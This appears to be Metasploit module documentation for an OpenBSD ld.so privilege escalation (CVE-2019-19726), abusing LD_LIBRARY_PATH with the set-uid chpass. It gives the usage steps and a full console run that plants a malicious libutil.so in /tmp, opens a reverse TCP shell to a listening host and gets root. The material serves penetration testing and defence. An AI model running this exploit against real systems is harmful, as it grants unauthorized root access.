adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
metasploit-gs/documentation/modules/exploit/openbsd/local/dynamic_loader_chpass_privesc.md
T

103 lines
3.0 KiB
Markdown
Raw Normal View History

Add OpenBSD Dynamic Loader chpass Privilege Escalation (CVE-2019-19726)
2019-12-22 08:46:43 +00:00
## Description
This module exploits a vulnerability in the OpenBSD `ld.so`
dynamic loader (CVE-2019-19726).
The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`
environment variable when set with approximately `ARG_MAX` colons.
This can be abused to load `libutil.so` from an untrusted path,
using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid
executable, resulting in privileged code execution.
## Vulnerable Application
This module has been tested successfully on:
* OpenBSD 6.1 (amd64)
* OpenBSD 6.6 (amd64)
## Verification Steps
1. Start `msfconsole`
2. Get a session
3. `use exploit/openbsd/local/dynamic_loader_chpass_privesc`
4. `set SESSION <SESSION>`
5. `check`
6. `run`
7. You should get a new *root* session
## Options
**SESSION**
Which session to use, which can be viewed with `sessions`
**CHPASS_PATH**
Path to chpass (default: `/usr/bin/chpass`)
## Scenarios
### OpenBSD 6.1 GENERIC#19 amd64
```
msf5 > use exploit/openbsd/local/dynamic_loader_chpass_privesc
msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > set verbose true
verbose => true
msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > set session 1
session => 1
msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > check
[+] Patch 013_ldso is not present
[+] cc is installed
[*] The service is running, but could not be validated.
msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(openbsd/local/dynamic_loader_chpass_privesc) > run
[*] Started reverse TCP double handler on 172.16.191.165:4444
[+] Patch 013_ldso is not present
[+] cc is installed
[+] Found libutil.so name: libutil.so.12.1
[*] Writing '/tmp/.86MXG.c' (316 bytes) ...
[*] Max line length is 4096
[*] Writing 316 bytes in 1 chunks of 1145 bytes (octal-encoded), using printf
[*] Compiling /tmp/libutil.so.12.1 ...
[*] Writing '/tmp/.DRbqHJ.c' (602 bytes) ...
[*] Max line length is 4096
[*] Writing 602 bytes in 1 chunks of 2170 bytes (octal-encoded), using printf
[*] Compiling /tmp/.DRbqHJ ...
[*] Writing '/tmp/.2bowjnW1' (139 bytes) ...
[*] Max line length is 4096
[*] Writing 139 bytes in 1 chunks of 470 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Y6H5kRiGDyQjzQKI;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Y6H5kRiGDyQjzQKI\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.205:43611) at 2019-12-13 04:03:22 -0500
[+] Deleted /tmp/.86MXG.c
[+] Deleted /tmp/libutil.so.12.1
[+] Deleted /tmp/.DRbqHJ.c
[+] Deleted /tmp/.DRbqHJ
[+] Deleted /tmp/.2bowjnW1
id
uid=0(root) gid=0(wheel) groups=1001(test)
uname -a
OpenBSD openbsd-6-1.localdomain 6.1 GENERIC#19 amd64
```
Reference in New Issue Copy Permalink